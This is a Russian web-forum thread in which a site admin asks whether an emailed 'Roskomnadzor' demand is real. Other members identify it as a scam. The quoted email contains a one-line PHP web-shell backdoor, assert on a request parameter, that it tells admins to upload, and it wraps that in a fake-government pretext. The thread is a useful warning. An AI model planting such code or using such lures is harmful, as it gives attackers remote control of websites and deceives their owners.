VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени site.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт site.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени site.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id120832.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени site.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени, следую инструкции указанной выше, то Ваш сайт будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
Хорошо что сегодня с отпуска приехал и 72 часа еще не прошли. Кто получал такие же письма, что будет если код этот не добавить? Заблокируют? Он (код) не вредный кстати? Роскомнадзор блин уже скоро в задницу ко мне залезет чтобы и ее внести в реестр.
У меня кстати даже 1000 человек в сутки ни разу не было, чего они ко мне лезут? Откуда насчитали более 3000?
inso добавил 29.08.2015 в 15:01
Письмо с адреса zapret-info@roskomnadzor.org
Это реальный роскомнадзор? Или какеры вредоносный код пихают?
inso добавил 29.08.2015 в 15:08
Перечитал пару раз письмо, написанное с опечатками и грамматическими ошибками. Похоже что ложная тревога
Last edited by inso : 08-29-2015 at 04:08 PM.
Reason: Добавлено сообщение
Luvilla, к сожалению я гугловские ящики нечасто проверяю. В основном на меиле все ящики у меня. Они удобнее. Надо взять на заметку почаще туда заглядывать. Спасибо.
Sellrion
Kernel panic
Версия vB: 3.8.x
Гуру 1921
Репутация в разделе: 39
0
Quote:
Originally Posted by inso
Надо взять на заметку почаще туда заглядывать.
А сам-то не видишь, что за код предлагают залить на сайт?
@inso
Знаток
Награды в конкурсах:
Версия vB: 3.8.4
Репутация в разделе: 27
Аллея Звезд
0
Sellrion, если б видел наверное не было бы этой темы. В пхп я не в зуб ногой.
Sellrion
Kernel panic
Гуру 1921
Репутация в разделе: 39
1
Quote:
В пхп я не в зуб ногой.
Ну а вот это должно было насторожить?
Quote:
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени
Какая связь между администратором домена и возможностью разместить файлик на сервере? Каким образом любой файл на сервере идентифицирует кого бы то ни было как администратора домена? Что значит "идентифицировать себя"? Подтвердить, что данный почтовый ящик принадлежит владельцу домена? Дак они это и так знают - они нашли его во whois и пишут на него. Если роскомнадзору нужна персональная информация об администраторе, они ее таким образом не получат. Если они сотрудничают с регистраторами, то у них эта инфа уже есть и подобные манипуляции вообще бессмысленны.
Sellrion добавил 29.08.2015 в 17:01
Quote:
У меня кстати даже 1000 человек в сутки ни разу не было, чего они ко мне лезут? Откуда насчитали более 3000?
Вот тут ты начал что-то подозревать. Чего ж паниковать-то?)
Last edited by Sellrion : 08-29-2015 at 06:01 PM.
Reason: Добавлено сообщение
@inso
Знаток
Награды в конкурсах:
Версия vB: 3.8.4
Репутация в разделе: 27
Аллея Звезд
1
Sellrion, ну да насторожила, поэтому я и спросил совета, а не побежал пхп файл заливать;)
kerk
k0t
Гуру 20333
Репутация в разделе: 248
0
Quote:
а не побежал пхп файл заливать
а многие таки побежали... =\
Luvilla
Гость
Quote:
Originally Posted by Sellrion
Чего ж паниковать-то?)
Роскомнадзор уже так всех запугал, что теперь им пугают маленьких детей админов
Quote:
Originally Posted by kerk
а многие таки побежали... =\
вот именно
не вдумываясь и не вчитываясь, ни в текст письма, ни в код...